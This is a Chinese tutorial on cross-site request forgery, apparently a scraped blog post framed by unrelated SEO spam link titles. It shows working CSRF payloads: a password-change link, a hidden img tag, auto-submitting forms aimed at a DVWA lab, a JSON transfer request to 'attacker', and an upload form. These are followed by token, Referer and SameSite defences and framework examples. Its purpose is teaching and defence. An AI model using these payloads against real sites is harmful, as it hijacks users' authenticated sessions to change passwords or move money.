当前位置: 首页 > wzjs >正文

建广告网站需要多少钱软文推广平台排名

建广告网站需要多少钱,软文推广平台排名,漯河做网站的,北京病毒变异最新消息文章目录 一 初识CSRF二 CSRF攻击的工作原理三 DVWA环境中的CSRF演示3.1 DVWA环境搭建3.2 正常修改密码流程3.3 构造恶意链接3.4 自动化攻击演示四 CSRF与XSS的区别 五 CSRF攻击的防御措施5.1 使用CSRF Token5.2 验证Referer头部5.3 SameSite Cookie属性5.4 双重验证 六、实际开…

文章目录

  • 一 初识CSRF
  • 二 CSRF攻击的工作原理
  • 三 DVWA环境中的CSRF演示
    • 3.1 DVWA环境搭建
    • 3.2 正常修改密码流程
    • 3.3 构造恶意链接
    • 3.4 自动化攻击演示
    • 四 CSRF与XSS的区别
  • 五 CSRF攻击的防御措施
    • 5.1 使用CSRF Token
    • 5.2 验证Referer头部
    • 5.3 SameSite Cookie属性
    • 5.4 双重验证
  • 六、实际开发中的CSRF防护
    • 6.1 Django中的CSRF防护
    • 6.2 Laravel中的CSRF防护
    • 6.3 Spring Security中的CSRF防护
  • 七、CSRF攻击的高级变种
    • 7.1 JSON CSRF
    • 7.2 文件上传CSRF
  • 八、CSRF攻击的检测与测试
    • 8.1 手动测试步骤
    • 8.2 使用工具测试

一 初识CSRF

  • CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的Web安全漏洞,它利用了Web应用程序对用户浏览器的信任机制。简单来说,就是攻击者诱骗受害者在登录受信任网站的情况下,访问恶意网站或点击恶意链接,从而在不知情的情况下以受害者身份执行非预期的操作。

  • 想象这样一个场景:你登录了网上银行后没有退出,然后不小心点击了一个朋友发来的"搞笑图片"链接。这个链接实际上暗藏玄机,它可能悄悄地向银行服务器发送转账请求,而银行认为这是你本人操作的,因为你的登录状态仍然有效。这就是CSRF攻击的典型例子。

二 CSRF攻击的工作原理

  • 要理解CSRF,需要了解几个关键概念:
  1. Cookie的身份验证机制:网站通常使用Cookie来维持用户的登录状态
  2. 浏览器的同源策略:限制不同源的脚本获取或修改其他源的资源
  3. 请求的自动携带:浏览器会自动在请求中携带当前域的Cookie

CSRF攻击之所以能成功,是因为:

  • 用户已经登录了目标网站(如银行、社交网络)
  • 目标网站仅依赖Cookie进行身份验证
  • 攻击者可以预测或知道请求的参数
  • 用户在没有登出目标网站的情况下访问了恶意页面

三 DVWA环境中的CSRF演示

  • 通过DVWA(Damn Vulnerable Web Application)安全演练的靶场来实际演示CSRF攻击。

3.1 DVWA环境搭建

  • 确保已经安装了DVWA(可以通过XAMPP、Docker等方式安装),并将安全级别设置为"low":
  1. 登录DVWA(默认账号admin/password)
  2. 点击"DVWA Security",选择安全级别为"Low"
  3. 进入"CSRF"模块

3.2 正常修改密码流程

  • 在DVWA的CSRF模块中,有一个简单的密码修改功能。正常流程如下:
    http://ip:port/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#
    
  • 这个URL会触发密码修改操作,将密码改为"123456"。

3.3 构造恶意链接

  • 攻击者可以构造这样一个链接,并诱骗已登录DVWA的用户点击:
    <a href="http://ip:port/vulnerabilities/csrf/?password_new=hacked&password_conf=hacked&Change=Change#">点击领取免费礼品卡!</a>
    
  • 或者更隐蔽的方式,使用图片标签:
    <img src="http://ip:port/vulnerabilities/csrf/?password_new=hacked&password_conf=hacked&Change=Change#" width="0" height="0">
    
  • 当用户点击链接或加载图片时,密码就被悄无声息地修改了。

3.4 自动化攻击演示

  • 更高级的攻击可以通过自动提交表单实现:
    <html><body><form action="http://192.168.1.21:4280/vulnerabilities/csrf/" method="GET"><input type="hidden" name="password_new" value="hacked"><input type="hidden" name="password_conf" value="hacked"><input type="hidden" name="Change" value="Change"></form><script>document.forms[0].submit();</script></body>
    </html>
    
  • 当用户访问这个页面时,表单会自动提交,完成密码修改。

四 CSRF与XSS的区别

  • 初学者常常混淆CSRF和XSS(跨站脚本攻击),它们确实有一些相似之处,但本质不同:
特性CSRFXSS
攻击目标利用用户的身份执行特定操作窃取用户数据或会话信息
攻击方式需要用户点击链接或访问页面需要向页面注入恶意脚本
同源策略利用浏览器对目标网站的同源策略绕过直接违反同源策略
防御重点验证请求来源过滤用户输入和输出编码

五 CSRF攻击的防御措施

  • 了解了CSRF的攻击原理后,我们来看看如何防御:

5.1 使用CSRF Token

最有效的防御方法是使用CSRF Token。它的工作原理是:

  1. 服务器生成一个随机Token,存储在session中
  2. 将Token嵌入表单或请求参数中
  3. 提交请求时,服务器验证Token是否匹配
  • DVWA在"high"安全级别下就实现了CSRF Token:
// 生成Token
if( isset( $_SESSION[ 'session_token' ] ) ) {$session_token = $_SESSION[ 'session_token' ];
} else {generateSessionToken();
}// 验证Token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

5.2 验证Referer头部

  • 检查HTTP请求的Referer头部,确保请求来自合法的源:
if (strpos($_SERVER['HTTP_REFERER'], 'https://yourdomain.com') !== 0) {die("非法请求来源");
}

5.3 SameSite Cookie属性

  • 设置Cookie的SameSite属性可以限制第三方Cookie的发送:
Set-Cookie: sessionid=xxxx; SameSite=Strict; Secure; HttpOnly

SameSite有三种模式:

  • Strict:完全禁止第三方Cookie
  • Lax:宽松模式,允许部分安全请求(如导航)携带Cookie
  • None:关闭SameSite保护(需要同时设置Secure)

5.4 双重验证

  • 对于敏感操作(如转账、修改密码),要求用户进行二次验证(如输入密码、短信验证码等)。

六、实际开发中的CSRF防护

  • 在实际开发中,现代框架通常内置了CSRF防护:

6.1 Django中的CSRF防护

# 模板中
<form method="post">{% csrf_token %}...
</form># 视图中
from django.views.decorators.csrf import csrf_protect@csrf_protect
def my_view(request):# 视图逻辑

6.2 Laravel中的CSRF防护

// 表单中
<form method="POST" action="/profile">@csrf...
</form>// 验证
Route::post('profile', function () {// 请求会自动验证CSRF token
});

6.3 Spring Security中的CSRF防护

// 默认启用,只需在表单中添加
<input type="hidden" name="${_csrf.parameterName}" value="${_csrf.token}"/>

七、CSRF攻击的高级变种

  • 随着防御措施的普及,攻击者也开发出了一些高级CSRF技术:

7.1 JSON CSRF

  • 当API仅依赖Cookie认证且接受JSONP或宽松的CORS策略时,可能通过构造恶意页面发起JSON请求:
<script>var xhr = new XMLHttpRequest();xhr.open("POST", "https://api.example.com/transfer", true);xhr.withCredentials = true;xhr.setRequestHeader("Content-Type", "application/json");xhr.send('{"amount":1000,"to":"attacker"}');
</script>
  • 防御方法:严格设置CORS,拒绝非预期的Content-Type。

7.2 文件上传CSRF

  • 如果文件上传接口没有CSRF防护,可能被利用来上传恶意文件:
<form action="https://example.com/upload" method="POST" enctype="multipart/form-data"><input type="file" name="file"/><input type="hidden" name="token" value="malicious"/>
</form>
<script>document.forms[0].submit();</script>

八、CSRF攻击的检测与测试

  • 作为开发者,如何测试自己的应用是否存在CSRF漏洞?

8.1 手动测试步骤

  1. 登录目标应用,获取有效会话
  2. 在另一个浏览器标签中打开恶意页面
  3. 检查是否能在用户不知情的情况下执行操作
  4. 检查关键操作是否有CSRF Token等防护

8.2 使用工具测试

  • Burp Suite:使用CSRF PoC生成器
  • OWASP ZAP:自动扫描CSRF漏洞
  • CSRF Tester:Firefox插件
http://www.dtcms.com/wzjs/2191.html

相关文章:

  • 设计公司企业站seo外包是什么
  • 用什么网站能直接做dj百度关键词优化软件如何
  • 淘宝网站可以做百度快照吗电商网站项目
  • 四川做网站设计哪家好全自动引流推广软件app
  • 公司起名用字大全seo优化排名经验
  • 做网站后台软文街
  • 网站建设 APP开发销售怎么做双滦区seo整站排名
  • 网站搭建后如何使用seo的优点和缺点
  • 河北省建设机械协会网站首页考研培训班集训营
  • 自己如何网站建设网站排名优化培训课程
  • 做购物网站哪种服务器好百度推广客户端怎样注册
  • 仿网站后台怎么做网站推广软文
  • 做网站开发的电话销售话术windows优化大师会员
  • 徐州优化网站互联网推广公司靠谱吗
  • 凡客网站建设宁宁网seo
  • 用电脑做服务器制作网站广告推广平台哪个好
  • jsp网站开发环境今日的头条新闻
  • 三合一网站建设今日最新头条新闻条
  • 网站内部结构比较火的推广软件
  • 传播公司可以做门户网站吗百度广告代理公司
  • java 小说网站开发北京发生大事了
  • 手机版网站制作应用排名优化价格
  • 合肥市做网站多少钱网站推广论坛
  • 重庆做网站的网络公司网站域名查询官网
  • 学做视频的网站有哪些内容seo网络推广排名
  • 有没有什么做海报字体的网站seo网站推广专员
  • 深圳做网站推广哪家好推广普通话手抄报简单
  • 哪些网站是用twcms做的本站3天更换一次域名yw
  • 网站欺骗消费者怎么做外链怎么发
  • 联雅网站建设公司吸引人的软文